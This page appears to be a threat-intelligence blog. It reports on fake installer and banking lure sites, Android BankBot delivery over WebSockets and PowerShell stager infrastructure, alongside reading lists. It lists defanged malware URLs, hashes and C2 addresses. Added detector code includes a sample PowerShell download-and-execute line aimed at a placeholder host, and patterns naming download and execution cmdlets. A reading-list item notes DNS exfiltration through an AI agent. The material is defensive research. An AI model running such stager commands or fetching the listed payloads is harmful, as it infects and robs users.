SecuritySnacks

SecuritySnack: 18+E-Crime

Starting in September 2024, a financially motivated cluster of more than 80 spoofed domain names and lure websites began targeting users with fake applications and websites themed as government tax sites, consumer banking, age 18+ social media content, and Windows assistant applications. The actor used these spoofed domains to deliver Android and Windows trojans, likely to steal credentials, or to harvest them more overtly through fake login pages.

Details

Websites themed as Windows Installation Assistant download pages, such as the following, were used to deliver Windows trojans.

ms32-download[.]pro

corp-ms32-download[.]pro

Download URL: https[:]//cozzystaysemarang[.]com/temp/winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Filename: winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Sha256: 3767140145cef85204ddec1285f5dc8544bfcf8ff22318c11073baaa476385fc

The same delivery domain was previously observed delivering APK files in June 2025.

APK Sha256: a83a442f930fea310d391f852385e3673d8c7128e5bbdc2b68217838c78381fa

More recent versions used a different domain with a very long URL, likely to hide the filename from automated security tools and, to a lesser extent, from human review. The excessive encoded spaces (%20) and the overall length may bypass some detection rules or regular expressions written to match malicious patterns.

Download URL:

https[:]//fleetfedx[.]com/Installer%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20em_OtvJCxP1_installer_Win7-Win11_x86_x64.msi

SHA256: 71cd466073bf23b43111dbc68ccaf1064e737f3f9ffebfec9a6f5146af6a34b9
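The following is an added example, not code from the original report: it normalizes a padded download URL like the one above before a filename rule runs, and shows that a naive length-capped rule misses the raw URL but matches the normalized one. The host in the constructed sample URL is a placeholder.

```python
"""Normalize padded download URLs before filename rules run (added example)."""
import re
from urllib.parse import unquote, urlsplit

# A deliberately naive rule of the kind the padding defeats: a last path
# segment of at most 64 characters ending in an installer extension.
NAIVE_RULE = re.compile(r"/[^/]{1,64}\.(?:exe|msi|apk)$", re.IGNORECASE)
EXEC_EXT = re.compile(r"\.(?:exe|msi|apk)$", re.IGNORECASE)


def refang(url: str) -> str:
    """Undo the [.] and [:] defanging used in threat reports."""
    return url.replace("[.]", ".").replace("[:]", ":")


def normalize_download_url(url: str) -> dict:
    """Percent-decode the path, collapse whitespace runs and pull out the filename."""
    parts = urlsplit(refang(url))
    decoded = unquote(parts.path)
    # Runs of two or more whitespace characters are the %20 padding we care about.
    runs = re.findall(r"\s{2,}", decoded)
    collapsed = re.sub(r"\s+", " ", decoded).strip()
    return {
        "normalized": f"{parts.scheme}://{parts.netloc}{collapsed}",
        "filename": collapsed.rsplit("/", 1)[-1],
        "pad_chars": sum(len(r) for r in runs),
        "raw_length": len(url),
    }


def assess_download_url(url: str, pad_threshold: int = 8) -> dict:
    """Run the naive rule on raw and normalized forms and give a verdict.

    The pad_threshold value is an assumption for this example.
    """
    info = normalize_download_url(url)
    info["naive_hit_raw"] = bool(NAIVE_RULE.search(refang(url)))
    info["naive_hit_normalized"] = bool(NAIVE_RULE.search(info["normalized"]))
    executable = bool(EXEC_EXT.search(info["filename"]))
    if executable and info["pad_chars"] >= pad_threshold:
        # Installer filename hidden behind whitespace padding: the lure pattern.
        info["verdict"] = "suspicious"
    elif executable:
        info["verdict"] = "review"
    else:
        info["verdict"] = "benign"
    return info


# Constructed sample modelled on the lure URL above; the host is a placeholder.
PADDED_URL = ("https[:]//lure-host[.]example/Installer" + "%20" * 150
              + "em_OtvJCxP1_installer_Win7-Win11_x86_x64.msi")
PLAIN_URL = "https://downloads.example.com/tools/readme.txt"

if __name__ == "__main__":
    for sample in (PADDED_URL, PLAIN_URL):
        result = assess_download_url(sample)
        print(result["verdict"], repr(result["filename"]),
              "naive raw:", result["naive_hit_raw"],
              "naive normalized:", result["naive_hit_normalized"])
```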

The download links also fire a Facebook tracking pixel from their on-click handler: onclick="fbq('track', 'Lead');". This indicates that the attacker is running this as a campaign: they are likely using Facebook ads or other methods to drive traffic to the fake page and are tracking their "conversion rate", i.e. how many people they successfully trick into clicking the malicious download link.

Facebook Tracker Ids:

  • 1354988235984551
  • 690114973584418
  • 1327164645166821

A Yandex tracker was also identified in use: 97105740

Connective Tissue

Registrar

  • PDR Ltd. d/b/a PublicDomainRegistry.com
  • GMO Internet, Inc.

IP ISP

  • BL Networks
  • H2nexus Ltd
  • H2.nexus Frankfurt Network

Name Server Domain

  • regway[.]com

Top Level Domains

  • Pro, Shop, Com, Icu, Top

Registrant Email Domains

  • fviainboxes[.]com
  • dropjar[.]com
  • replyloop[.]com
  • yopmail[.]com
  • robot-mail[.]com
  • protonmail[.]com

Trackers

  • Facebook: 690114973584418
  • Facebook: 1327164645166821
  • Facebook: 1354988235984551
  • Yandex: 97105740

The majority of the cluster's domains targeted users with age 18+ themed TikTok, YouTube, and online gambling Android applications. Other themes involved several prominent consumer banks and cryptocurrency exchanges, including USAA, PMC, Bloomberg, and Binance. A subset of the domains hosted fake Windows 11 Installation Assistant and TrustCon VPN application downloads.

A breakdown of the cluster's domains and websites by spoofed industry shows that the majority are directly finance related, including the government tax sites.

Sample screenshots of spoofed websites for malware delivery and credential harvesting:

Conclusion

This report highlights a persistent and financially motivated cybercrime operation employing common techniques, including spoofed domains and lure websites to distribute malware and harvest credentials. 

The most common lures preyed on curiosity and desire, which can override a user's normal caution. The promise of forbidden or exclusive content is a powerful social engineering tool. Subsequently, victims are often embarrassed to admit how their device was infected. They are less likely to report the malicious app to authorities, security vendors, or even their IT department, allowing the malware to persist longer and the campaign to remain undetected.

They operate with the mindset of a malicious marketing firm, prioritizing scale and conversion rates over high-level technical sophistication. The use of template-based website builders indicates a focus on rapid deployment and disposability of their infrastructure, allowing them to quickly pivot and evade takedowns, browser-based warnings, and blocklisting mechanisms.

Users are advised to exercise extreme caution when encountering unfamiliar links or download prompts, particularly those related to banking, social media, or system utilities.

IOCs

Emails


Domains

Cybersecurity Reading List - Week of 2025-09-29

Commentary followed by links to cybersecurity articles that caught our interest internally.

The days are getting shorter, and so is the news cycle. 

It’s A Lot. 

Bright spots emerge from the pattern, and one of the brightest in a while occurred last week for me - LABScon. SentinelOne and various sponsors manage to gather nearly two hundred of the top cybersecurity folks every year to talk and listen to each other, and I was honored to be admitted this year. The agenda itself is public and tells you enough to know just what kind of impact speakers can have: human rights investigators, harassment fighters, nation-state espionage mitigators, and more. 

While a lot of it was TLP:RED, one thing I’m confident in sharing is the week showed me a community of folks intent and determined on doing good for the world. Many are positioned to follow through on that in some way and are excited to talk about it to a full room or one-on-one with a complete stranger. 

It’s a posture I’m trying hard to carry back from con and out into the world.

On another note, something I’m seeing more of that I want to flag for folks: RecordedFuture published a great report on Stark Industries workarounds to deal with EU sanctions, and Brian Krebs expanded upon it with a great post as well. 

One of the common themes in conversation alongside harder research lately has been the intermediate and long-term ineffectiveness of many of our interventions targeting malicious actors, groups, and campaigns. Takedowns are momentarily gratifying - as I’ve said before, we need to celebrate the wins where we can - but do not seem to provide longitudinal benefits. What does effective long term disruption look like, and is it feasible? What are the models, and what are the realities?

For my part, I’ve been looking at bad actors’ activities before and after US OFAC and UK OFSI sanctions to understand both preparation and reaction. Emerging from technical observables like DNS and BGP is an opaque but solid understanding that bad actors are much better at reliability engineering and disaster recovery than we want to admit, from domain mirroring all the way up to anticipatory Autonomous System takeover. I’ve submitted a talk to CYBERWARCON on the topic (and hopefully it’s accepted!), but if folks reading this know of work around long-term disruption, cybersecurity-related sanctions research, or adjacent topics, I’d love to hear from you. Please shoot me an email at CSRL at domaintools[.]com. 

Podcasts

Microsoft Threat Intelligence - Stopping Domain Impersonation with AI - I know, I know, I’m tired of AI all the time too. But it’s timely and important to stay on top of. Good conversation, especially around how the problem is one of scale rather than sophistication.

Three Buddy Problem - I can’t choose between them, so you get all three Live from LABScon episodes. 

Articles

The Record - Ransomware gang takedowns causing explosion of new, smaller groups - Immediately thought of research we conducted with Analyst1 and Scylla Intel and presented at SLEUTHCON earlier this year. Of particular interest is the finding that disruption tends to result in smaller groups reconstituting around critical trust relationships. 

Infoblox - Deniability by Design: DNS-Driven Insights into a Malicious Ad Network - Incredibly good work by Infoblox weaving deep technical details and deep narrative into a systematic understanding of not just malicious adtech but the behavior behind it and thorough methods to fingerprint and track it. 

Morningstar - Unit 221B Raises $5M in Seed Funding To Convert Threat Intelligence into Real World Arrests - You love to see it. Congratulations to our friends at Unit 221B, who should have people throwing large piles of cash at them all the time, given how excellent their work is. 

Google TIG - Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors - Targeting profile prioritized “legal services, Software as a Service (SaaS) providers, Business Process Outsourcers (BPOs), and Technology.” Excellent writeup by TIG, as always.

Schneier - Surveying the Global Spyware Market - Schneier highlights two important points: that investment in spyware companies has risen lately, and the role of brokers and resellers that often go unnoticed in the chain. 

Koi Security - First Malicious MCP in the Wild - Thousands of downloads a week and it’s copying every email to the dev’s personal server. Because the S in MCP stands for Security!

CSO - Why domain-based attacks will continue to wreak havoc - The dangerousness of these attacks long predated AI, including at scale, but this is a pretty good review of some domain attacks to take note of and ensure you’ve worked into your defenses and simulations.

Group-IB - Mapping the Infrastructure and Malware Ecosystem of MuddyWater - Not always the biggest fan of Group-IB, but indicators are indicators, and there’s some good work here about how Muddy Water’s tradecraft is evolving.

Microsoft - Microsoft seizes 338 websites to disrupt rapidly growing ‘RaccoonO365’ phishing service - Joint work between Microsoft DCU and Health-ISAC, highlighting the role RaccoonO365 has adopted in targeting the healthcare sector.

Research Papers and Reports

arXiv - Large Language Models for Security Operations Centers: A Comprehensive Survey - Not ground-breaking, but some valuable LLM/SOC fundamentals covered here.

Entertainment

GadgetReview - Massive Attack Turns Concert Into Facial Recognition Surveillance Experiment - Massive Attack hasn’t commented on data retention from the event, laying bare the ambiguity and lack of agency that goes unseen in all the other applications. A+

Banker Trojan Targeting Indonesian and Vietnamese Android Users

Since approximately August 2024, a group has been targeting Indonesian and Vietnamese Android users with banking trojans disguised as legitimate payment and government identity applications. The operators exhibit distinct domain registration patterns, often reusing TLS certificates and grouping domains to resolve to the same IP addresses, with a strong operational focus during Eastern Asia's daytime hours.

Details

The pattern was initially identified by monitoring for suspicious site elements, such as the Google Play Store markup matched by http.html:"VfPpkd-jY41G-V67aGc", which may indicate spoofed Play Store websites used for malware delivery.

icrossingappxyz[.]com

The page contains fake Google Play Store and App Store download buttons. Clicking the Google Play button starts an on-page download progress bar and then prompts for a download location on the device. The App Store link was nonfunctional.

The site wraps the Socket.IO library, which enables real-time, bidirectional communication with a server, in an obfuscation layer. This is highly abnormal for a download page. Instead of linking directly to a file, clicking the Android button opens a WebSocket connection and emits socket.emit('startDownload', ...). The server responds by streaming the .apk file back to the browser in many small chunks, which the page collects with socket.on('chunk', (chunk) => { chunks.push(chunk); }). Alongside the data, the server sends downloadProgress messages that the script uses to update the on-screen progress bar, so the user believes a normal download is occurring. When the server sends downloadComplete, the script combines all the chunks in memory, sets the type to 'application/vnd.android.package-archive' (the MIME type for an APK file), creates a temporary local URL for the result, builds an invisible <a> element pointing at that URL, and programmatically clicks it. This triggers the browser's download prompt.

The malicious site operators likely attempted to evade detection and hide their malware store through the elaborate download method. Network security and firewalls might be configured to block direct downloads of .apk files. However, by hiding the file transfer inside WebSocket traffic, it can often slip through undetected. Since there is no static URL pointing to the malicious file, automated security scanners that crawl websites looking for malicious links will not find it.
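As an added example (not code from the original report), the following scores page source for the chunked Socket.IO delivery pattern described above and contrasts it with a page that links to the APK directly, which is what a link-crawling scanner would catch. Both HTML samples are constructed, and the indicator weights and threshold are assumptions.

```python
"""Flag pages that deliver an APK over Socket.IO rather than a static URL."""
import re

# (label, regex, weight). Event names follow the flow described above;
# the weights are an assumption for this example.
INDICATORS = [
    ("socket.io client", r"socket\.io(?:\.min)?\.js|\bio\(", 1),
    ("startDownload emit", r"\.emit\(\s*['\"]startDownload['\"]", 3),
    ("chunk listener", r"\.on\(\s*['\"]chunk['\"]", 3),
    ("downloadProgress listener", r"\.on\(\s*['\"]downloadProgress['\"]", 1),
    ("downloadComplete listener", r"\.on\(\s*['\"]downloadComplete['\"]", 2),
    ("APK MIME type", r"application/vnd\.android\.package-archive", 3),
    ("object URL + programmatic click",
     r"createObjectURL\([^)]*\)[\s\S]{0,300}?\.click\(\)", 2),
]
THRESHOLD = 8  # a lone socket.io include or MIME string should not trip it


def score_page(html: str) -> dict:
    """Return the matched indicators, their summed weight and a verdict."""
    hits = [(label, weight) for label, pattern, weight in INDICATORS
            if re.search(pattern, html)]
    score = sum(weight for _, weight in hits)
    return {
        "score": score,
        "indicators": [label for label, _ in hits],
        "verdict": "socketio_apk_delivery" if score >= THRESHOLD else "clean",
    }


def static_apk_links(html: str) -> list:
    """What a link-crawling scanner sees: href values ending in .apk."""
    return re.findall(r"href=['\"]([^'\"]+\.apk)['\"]", html, re.IGNORECASE)


# Constructed page modelled on the chunked-download flow described above.
CHUNKED_PAGE = """
<script src="/socket.io/socket.io.min.js"></script>
<a id="android" href="#">Get it on Google Play</a><div id="bar"></div>
<script>
const socket = io(); const chunks = [];
document.getElementById('android').onclick = () => socket.emit('startDownload', {app: 'ikd'});
socket.on('chunk', (chunk) => { chunks.push(chunk); });
socket.on('downloadProgress', (p) => { document.getElementById('bar').style.width = p + '%'; });
socket.on('downloadComplete', () => {
  const blob = new Blob(chunks, {type: 'application/vnd.android.package-archive'});
  const a = document.createElement('a');
  a.href = URL.createObjectURL(blob); a.download = 'app.apk'; a.style.display = 'none';
  document.body.appendChild(a); a.click();
});
</script>
"""

# Constructed page in the plainer style also described above: a direct link.
DIRECT_PAGE = """
<a href="/tax-app/M-Pajak.apk">Download on Google Play</a>
"""

if __name__ == "__main__":
    for name, page in (("chunked", CHUNKED_PAGE), ("direct", DIRECT_PAGE)):
        print(name, score_page(page), static_apk_links(page))
```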

It is worth noting that some browsers correctly flagged these downloads as suspicious with download warning prompts such as the following:

IdentitasKependudukanDigital.apk

1f9253092c5a2abdb7bc3d93fccad85f23ce5bfde38377c792a242f045afcdb5

The file was detected as BankBot.Remo.1.origin, a previously closed-source banking trojan whose source code was leaked on Russian-language forums in 2016, which has since resulted in many variants.

Other, much more commonplace malware delivery sites were also used, such as the following spoof of M-Pajak, a tax payment app. It simply spoofs the Google Play Store page and has a direct download URL for the malicious file stored on the server. Notably, the site used a mix of Thai, Vietnamese, Portuguese, and Indonesian strings in the HTML code rather than inserting the correct language dynamically based on the visitor's Accept-Language header or GeoIP. This suggests these are template files used by unsophisticated operators.

twmlwcs[.]cc

Download URL: https[:]//twmlwcs[.]cc/tax-app/M-Pajak.apk

M-Pajak.apk

SHA256 Hash: e9d3f6211d4ebbe0c5c564b234903fbf5a0dd3f531b518e13ef0dcc8bedc4a6d  

The downloaded file is also a loader for BankBot and is configured with the following C2 domains: 

saping.ynhqhu[.]com
aaping.ynhqhu[.]com
admin.congdichvucongdancuquocgia[.]cc
admin.outdoormovietheaters[.]com

Of the more than 100 domains identified in this activity for malware distribution, there was only a very limited number of variations in the spoofed content used for delivery. The slight variations can be seen in the following sample screenshots, which also follow the fake verification trends that have become commonplace over the past year.

The group also has a nice habit of keeping their malware in open web directories such as the following:

Open Index of dgpyynxzb[.]com


Open Index of ykkadm[.]icu


indiemusicacademi[.]com

Domain Registration Patterns

Over the past 12 months, the actor was observed using distinct domain registration patterns. This often included the reuse of TLS certificates on two domains and grouping multiple domains to resolve to the same IP addresses. 

  • ISP:
    • Alibaba
    • Scloud
    • CloudFlare
  • IP Country: SG, ID
  • Common Website title and page:
    • Identitas Kependudukan Digital- Apps on Google Play
  • Server Type: nginx
  • Nameserver:
    • share-dns[.]net 
    • cloudflare[.]com
  • SSL Issuer: R10, R11, WE1
  • Registrar:
    • Gname.com Pte. Ltd.

The most prolific registration patterns were the use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers. 

Heatmaps showing the domain registration (left) and first seen DNS requests (right) with the time of day (UTC) over the year.

The heatmaps for domain registration and first-seen DNS resolutions show a visually similar grouping, and the delta between domain registration and first-seen DNS request averaged 10.5 hours over the year. This suggests the domains are consistently operationalized quickly after registration, though not nearly as rapidly as by other, more prominent cybercrime groups.

The time data shows a strong grouping around eastern Asia's daytime hours, as is expected with the likely focus on targeting Indonesian and Vietnamese mobile users. It may also suggest the operators are working during the same times, if not also located in the same region.

Conclusion

The malicious operators employed some methodologies to bypass network security that might block direct downloads and prevent static URL-based security scanners from detecting the malicious files. However, it is worth noting that some browsers correctly flag these downloads as suspicious, displaying warning prompts to users and serving as a crucial line of defense for end users. Additionally, several commonplace methodologies employed prominently by less sophisticated financially-motivated groups such as spoofing Google Play Store allow for the identification of these spoofed malware delivery sites. The consistent use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers across their operations provides a clear footprint of their infrastructure. While some spoofed sites, like twmlwcs[.]cc, show mixed language code possibly indicating template use by less sophisticated elements, the overall campaign exhibits a coordinated approach to malware delivery. Overall it is likely financially motivated and suspected of being operated by a group in the same region.

IOCs

Domains (see them on our Github as well)

Cybersecurity Reading List - Week of 2025-08-25

The sun has come for us, in the US. We escaped the desert only to trudge back into summer heat. But all is not lost - some things are looking better, and voluminous research has emerged from Hacker Summer Camp.

And now we enter the belly of the beast.

Summer is in full effect in the United States as many of us return from the surface of the sun, Hacker Summer Camp in Las Vegas (covered in a separate post here). The weeks after Black Hat and DEF CON also arrive with an abundance of gifts for practitioners and researchers: the publication of tons of new research. As always, the items linked below aren't intended to be a round-up but rather what caught attention internally, having stood out from the rest.

The rest of the year looms, but not without hope. 

There are some signs that spending freezes are easing and hiring may be picking up. Even in this heat, that's cold comfort for those in the middle of the job hunt. It's never been harder or more filled with frustration, dead ends, and deeper hazards like identity theft or financial scams. If you're in a place to help, try to do what you can.

If you’re still on the hunt, keep pushing, and get through however you can. 

Podcasts

Adversary Universe from Crowdstrike - Live at Black Hat: What’s AI Really Capable Of? - 33min - Good, grounded (but relatively upbeat) perspective on AI capabilities for both defenders and attackers. Also some interesting recent attack campaigns seen, including one with convincing multi-persona smishing threads (no evidence of AI in this latter, yet). 

CyberWire Research Saturday - Beyond the smoke screen - 22min - Excellent interview with Dr. Renee Burton of Infoblox Threat Intel detailing their extensive work on the VexTrio cybercriminal group. They gave a great Black Hat briefing on this topic, and the interview is similarly compelling in both technical and behavioral aspects.

Prompt||GTFO - Youtube playlists for episodes one, two, three - ~90min each - Fascinating series of “prompt pits” in which mostly infosec practitioners get together to share use cases and experiences with AI, with a strict “no slides” rule, demos only. Not an endorsement of AI, but interesting to see how practitioners are using it, and most views involved are pretty reasonable and experience-driven. 

Articles

Infoblox - VexTrio Origin Story, Unmasked, and Inside the Robot - A three-part investigation highlighting world-class research by Infoblox Threat Intel into the evolution, behavior, and technology of a major adtech-related spam and scam actor. Highly recommended to read all three in order to get a better idea of what you end up looking at in the wild.

Analyst1 - Ransomware Diaries Volume 7: “I Had to Take the Guilt For Everyone” – The Kaseya Hacker Breaks His Silence - Jon DiMaggio’s DEF CON talk with Jon Fokker gripped a full theater for an hour, and the accompanying blog post is even better. There are few investigators on his level, and even fewer storytellers.

Wunderwuzzi - Claude Code: Data Exfiltration with DNS (CVE-2025-55284) - Okay. So. I’m trying to be less adversarial towards GenAI, really I am. But when you allowlist a bunch of bash commands for your autonomous agent and include DNS lookups, you clear a direct path for a long-known and well-researched data exfiltration and command & control method. And then I have to get all mad and shouty again. 

RiskyBulletin - Hackers sabotage Iranian ships at sea, again - “According to an analysis of the leaked files, the group hacked the company's network, identified all maritime communications terminals in its MySQL database, and then deployed malicious code to each ship's satellite terminal that wiped its disk storage.” 

TechCrunch - North Korean spies posing as remote workers have infiltrated hundreds of companies, says CrowdStrike - What I can’t decide is if the seeming overwhelming success of this campaign is down to good execution on the part of DPRK or the sad, sad state of enterprise security, especially whenever it causes friction in hiring processes.

Cofense - Spain TLD’s Recent Rise to Dominance - Anecdotally I’d been seeing .es show up in my investigators more lately even before reading this, and once the article crossed my desk it made more sense. 

Research Papers and Reports

Greynoise Intelligence - Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities - Greynoise looked backward and found that in 80% of cases, a spike in attempted attacks on a particular technology presaged a CVE release for that technology within six weeks. Excellent work and findings, worth reading the full report. Also covered by Research Saturday interviewing Greynoise VP of Data Science Bob Rudis (30min). 

RecordedFuture - Cloud Threat Hunting and Defense Landscape - In which Insikt Group lays out five prominent attack vectors threatening cloud environments, including details on common misconfigurations as well as logging and hunting internally.

CAIDA - Hunting in the Dark: Metrics for Early Stage Traffic Discovery - “Using a metric for discoverability, we model the ability of defenders to measure Crackonosh traffic as the malware population decreases, evaluate the strength of various detection methods, and demonstrate how different darkspace sizes affect both the ability to track the malware, but enable emergent behaviors by exploiting attacker mistakes.”

arXiv - Security Challenges in AI Agent Deployment: Insights from a Large Scale Public Competition - Results of wide-scale competitive testing across several dozen agents and models, with an eye to evaluating attack transferability and common vulnerabilities. Some significant findings, including limited correlation between size, robustness, or inference-time, meaning that the “better” and “bigger” models didn’t do better than the bargain basement models. 

Tools and Resources

CSO Online - CISA releases Thorium, an open-source, scalable platform for malware analysis - Curious to see where this goes, relative to NSA’s Ghidra.

Entertaining Reading

Wikipedia - The Berners Street Hoax - “Hook spent six weeks sending between a thousand and four thousand letters to tradespeople and businesses ordering deliveries of their goods and services to 54 Berners Street, Westminster, at various times on 27 November 1810.”

Hunting for Malware Networks

Hunting for new malware delivery infrastructure often entails the identification and tracking of common techniques to deliver various stages of malware. See what our researchers stumbled upon.

Details

Hunting for new malware delivery infrastructure often entails identifying and tracking the common techniques used to deliver the various stages of malware. Take malware-as-a-service providers, for instance: one commonality in a recent activity cluster was the use of web-hosted PowerShell scripts that act as a reference to the next malware stage to download and execute. 

Multiple clusters of stealer activity were observed through early July using PowerShell scripts as an intermediate stage for malware delivery. Creating multiple stages of delivery reduces the initial risk of exposing all malware and associated infrastructure if it is detected early on in execution. It may also slow down response investigations and analysis. 

Hunting for malicious web-hosted PowerShell scripts can be as simple as using a Shodan query such as: http.html:"Invoke-WebRequest"

Example finding: 77.110.118[.]195, which resolved the malicious domain “alababababa[.]cloud”.

The host served a reused web-hosted PowerShell script that retrieves a malicious executable, build.exe, and then starts it as a new process.

Filename: build.exe
Sha256: 7ada4d7dfc00943780cb51ea182c7a221953cdabc394011204ba5cd8e4e8f0d3
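A defender-side way to triage what a hunt like the Shodan query above turns up, as an added example that is not the post's own tooling: a heuristic that scores a fetched script body for the download-then-execute pattern described here and extracts the next-stage URLs and dropped filenames to pivot on. The sample script bodies and the *.example.invalid host names are constructed.

```python
"""Triage web-hosted PowerShell bodies for the download-then-execute stager pattern.

Added example (not the post's tooling). Input is the text of a hosted script,
e.g. the body of a hit from a Shodan hunt; output is the evidence to pivot on.
"""
import re

# Cmdlets, aliases and .NET calls that fetch a remote payload.
DOWNLOAD_RE = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer|DownloadFile|DownloadString)\b"
)
# Cmdlets, aliases and LOLBins that launch what was fetched.
EXEC_RE = re.compile(r"(?i)\b(Start-Process|saps|Invoke-Expression|iex|rundll32|regsvr32|mshta)\b")
URL_RE = re.compile(r"""(?i)https?://[^\s'")]+""")
OUTFILE_RE = re.compile(r"""(?i)-OutFile\s+['"]?([^\s'"]+)""")


def score_stager(body: str) -> dict:
    """Flag a script body as a stager when it both fetches a remote file and launches something.

    Returns the evidence (matched verbs, URLs, dropped paths) so an analyst can pivot on
    the next-stage hosting domain and the dropped filename (cf. build.exe in the post).
    """
    downloads = sorted({m.lower() for m in DOWNLOAD_RE.findall(body)})
    execs = sorted({m.lower() for m in EXEC_RE.findall(body)})
    urls = sorted(set(URL_RE.findall(body)))
    dropped = OUTFILE_RE.findall(body)
    return {
        "stager": bool(downloads) and bool(execs) and bool(urls),
        "download_verbs": downloads,
        "exec_verbs": execs,
        "next_stage_urls": urls,
        "dropped_files": dropped,
    }


# --- constructed samples (hypothetical; not the scripts from the post) ---
SAMPLE_STAGER = r'''
$u = 'http://cdn.example.invalid/build.exe'
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\build.exe"
Start-Process "$env:TEMP\build.exe"
'''

# Legitimate admin use of the same cmdlet: fetches JSON, launches nothing.
SAMPLE_BENIGN = r'''
$r = Invoke-WebRequest -Uri 'https://api.example.invalid/status' -UseBasicParsing
($r.Content | ConvertFrom-Json).status
'''

if __name__ == "__main__":
    for name, body in (("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN)):
        print(name, score_stager(body))
```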

This script acts as a trojan and connects to a commonly used C2 domain, “anodes[.]pro”, which has communicated with more than 60 malicious files in the past 2 months, including multiple stealer malware families such as Amadey, Lumma, Luca, DeerStealer, and RedLine, as well as the Rugmi, BlackBasta and DarkGate malware families.

Expanding on the domain behavior in VirusTotal, one additional DeerStealer sample was identified, which also used the same C2 domain. 

Sha256: bd269a6328de0e534f4d8c3a42ea88a4343168053f63da0da95318f4ed17e705

Pivoting on the infrastructure associated with the identified intermediary domain “alababababa[.]cloud” through overlapping domain registration attributes identified potentially related activity:

  • NameServer: cloudflare[.]com
  • IP ISP: CloudFlare Inc
  • Address: compliance_abuse[@]webnic[.]cc
  • Registrar: WebNIC
  • SSL Issuer: WE1

Domains sharing these registration attributes:
  • alababababa[.]cloud
  • hugevcdn[.]pro
  • anodes[.]pro
  • servicesmesh[.]pro
  • interconstructionsite[.]pro
  • zurichinsurince[.]com
  • zhuchengsantian[.]com

Repeating the previous steps identifies additional malware with commonalities in stealer and C2 usage, such as Amadey malware observed with the domain “hugevcdn[.]pro”.

Sha256: 02c158c63d28fd5be24424e41b70a7a361c9be8897590c0453b0d30bd6e0d842
C2: 185.156.72[.]96/te4h2nus/index.php

Similar to the C2 domain “anodes[.]pro” but at considerably higher volume, the C2 IP 185.156.72[.]96 has been observed with over 2,700 malicious files communicating with it, notably many of the same wide range of malware-as-a-service families using it as a C2.

In addition, many of the malicious files for LummaStealer and Amadey shared a common C2 IP, “185.156.72[.]96”, which overlaps with a previous LummaStealer IP, “185.156.72[.]2”.

Both IPs are part of an obscure ASN, AS61432 (TOV VAIZ PARTNER). This ASN has only one prefix (185.156.72.0/24), which shows only 1 out of 719 BGP peer propagations at Hurricane Electric Services. The ASN claims Ukrainian origin and appears to be propagated by only 1 other ASN, AS50073 (Webcraft Found LLC) in Ukraine. This generally suggests the ASN may be part of a bulletproof hosting service (BPHS).

Example LummaStealer samples and C2s associated with the IPs 185.156.72[.]2 and 185.156.72[.]96 and with anodes[.]pro:


Noting reused SSH certificate hashes “hash:896675070” and “hash:-434889431” on the C2 IP address identifies several historic overlaps, such as the following recent IPs:

  • 185.156.72[.]97 > 0 malicious communicating files
  • 176.46.157[.]50 > 570 malicious communicating files
  • 185.156.72[.]96 > 2,800 malicious communicating files
  • 66.114.52[.]156 > 1 malicious communicating file
  • 176.46.157[.]32 > 660 malicious communicating files

In addition, there are indications that the large cluster of malware employs Amazon CloudFront, Amazon Global Accelerator EC2 instances, and GitHub user content to store and distribute malware, all of which create challenges in proactively blocking malicious domains.

Example 1:
  • https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/36b05b6030459ba5435705d8b91aae11f0ba268b/NIOAHYWM.exe
  • https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/6fd8d0859aa9d3d300bf79f3da8032b04b1ed540/OURDUBDV.exe
  • https[:]//github[.]com/peterson643eu/projecttop/raw/refs/heads/main/OURDUBDV.exe

Makes a request to http[:]//nexuswarps[.]shop/c
C2s: anodes[.]pro, multiport[.]shop

An SSL hash overlap with a CloudFront IP resolving to “70d9ae273c860e606f236c528381f9ca[.]cloudfront[.]net” suggests the CloudFront service may be used to relay traffic to another endpoint serving malware.

Sampling 200 of the communicating files with meaningful detection names in VirusTotal, and limiting to the past 3 months, shows an overrepresented share of LummaC2 and Amadey.

Despite law enforcement takedowns targeting LummaStealer infrastructure in May 2025, it appears Lumma is still operating and continues to be a prominent choice. We speculate that this particular cluster of malicious activity experimented with alternative choices during the month of June and may have opted to continue operations with LummaStealer.  

Conclusion

Despite a May 2025 law enforcement takedown targeting LummaStealer, the malware family appears to remain active and a popular choice for threat actors, particularly through bulletproof hosting services (BPHS) IPs. This analysis of observed malicious activity, with a focus on C2 IPs 185.156.72[.]96 and 185.156.72[.]2 (both part of AS61432, a suspected BPHS), suggests that while there may have been some experimentation with alternative malware during June, operations have largely continued with LummaStealer.

IOCs

Hacker Summer Camp Recap - A Snick Snack

What do scavenger hunts, malware, and wildcards have in common?

Hacker Summer Camp recedes into the rearview mirror and the world starts back up again.

Morning standup. Q3 sprint. Follow-ups and circle-backs. But perhaps we’re changed. Perhaps we re-enter the fray in a slightly different way, shedding data of a marginally changed nature. Philosopher and media theorist Marshall McLuhan said that as a species, “We look at the present through a rear-view mirror” in our “march backwards into the future.”

He continued: “Because of the invisibility of any environment during the period of its innovation, man is only conscious of the environment that has preceded it; in other words, an environment becomes fully visible only when it has been superseded by a new environment.”

Does the landscape after BSidesLV, Black Hat, and DEF CON count as a new environment? Could the information gleaned, hands shaken, and drinks shared change us significantly going forward?

For my part, I always emerge from this week in Las Vegas and find my surroundings drawn into sharper relief. Finer lines mark more edges, but they also bring us together in more ways, if we let them. Light sources are brighter, or revealed as so bright they hid now-revealed details, like a message written on the lightbulb only visible in the briefest of moments upon flicking the switch off. 

With McLuhan’s observation in mind, that may be my sign that our chaotic week of community each year marks a new environment, superseding the old and making the latter finally visible. 

